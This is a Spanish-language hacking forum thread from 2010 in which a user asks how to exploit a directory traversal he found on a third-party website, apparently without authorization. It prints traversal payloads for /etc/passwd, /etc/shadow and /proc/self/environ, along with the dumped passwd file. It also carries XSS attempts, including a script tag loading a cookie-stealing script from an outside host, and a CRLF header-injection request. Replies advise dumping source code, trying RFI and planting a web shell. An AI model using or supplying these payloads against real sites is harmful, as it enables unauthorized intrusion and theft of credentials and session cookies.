Título: Directory traversal Publicado por: chusrubi2 en 18 Octubre 2010, 20:57 pm Wenas, acabo de encontrar una vuln. en una web y es la siguiente:
../../../../../../../../../../etc/passwd%00.png al ejecutarla en el navegador sale: Código: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd ...... Y SIGUE ¿Cómo puedo explotar esta vuln? gracias. Título: Re: Directory traversal Publicado por: Erfiug en 18 Octubre 2010, 21:15 pm tienes permisos para abrir el fichero /etc/shadow?
este sólo te muestra los usuarios, con su home directory, default shell, grupos y demás.. Si por ejemplo es una aplicación en php puedes bajar el código fuente y buscar algún fichero que contenga información sensible. Quizá también sea vulnerable a RFI no estaría mal probar. Título: Re: Directory traversal Publicado por: Darioxhcx en 18 Octubre 2010, 21:15 pm lee sobre lfi :3
Título: Re: Directory traversal Publicado por: chusrubi2 en 18 Octubre 2010, 21:17 pm tienes permisos para abrir el fichero /etc/shadow? este sólo te muestra los usuarios, con su home directory, default shell, grupos y demás.. Si por ejemplo es una aplicación en php puedes bajar el código fuente y buscar algún fichero que contenga información sensible. Quizá también sea vulnerable a RFI no estaría mal probar. En cuanto vuelva on la web lo pruebo, está down ahora mismo. lee sobre lfi :3 A sus órdenes.Título: Re: Directory traversal Publicado por: xassiz~ en 18 Octubre 2010, 21:23 pm Puedes hacer cualquier tipo de LFI y variantes.
Por ejemplo mira si tiene proc/self/environ podrías llegar a subir una web shell. Título: Re: Directory traversal Publicado por: chusrubi2 en 18 Octubre 2010, 21:27 pm Puedes hacer cualquier tipo de LFI y variantes. 1.-Por ejemplo mira si tiene proc/self/environ podrías llegar a subir una web shell. Nada, no muestra nada. action=../../../../../../../../../../proc/self/environ%00.png No muestra nada cuando action=../../../../../../../../../../etc/shadow%00.png&id=4504 creo q solo es vuln pal passwd asi k no me deja. ¿Hay algun otro metodo? Si no se puede con directory traversal, la web es vulnerable tb a: -ASP.NET Padding Oracle Vulnerability -Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability Pero estas si q verdaderamente no se ni por donde empezar... 2.- EDITO 19/10: He sacado más vuln y es vuln a xss: " onmouseover=prompt(970448) bad=" Yo ya he usado anteriormente en otra web xss usando este codigo: http://xxxxx.com/?action=best&srt=1>"><script src="http://xxxxx/cookie.js">&dir=1 El problema es que no sé cómo implimentarlo aquí, es decir, he probado de todas formas y maneras: Vuln: action=best&dir=" onmouseover=prompt(970448) bad=" srt=0 Modificado: action=best&dir=" onmouseover=<script src="http://xxxxx/cookie.js"> bad=" srt=0 action=best&dir=" onmouseover=alert() bad=" srt=0 action=best&dir=" onmouseover=<script>alert()</script> bad=" srt=0 ETC... Pero nada funciona, solo el prompt. 3.- Vale esto es lo referente a xss, pero esque luego tambien es vulnerable a CRLF injection: /download.php?id=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&t=1287498936 El caso es que no me aparece nada, ¿debería? Haber si algun alma caritativa se atreve :D asias. |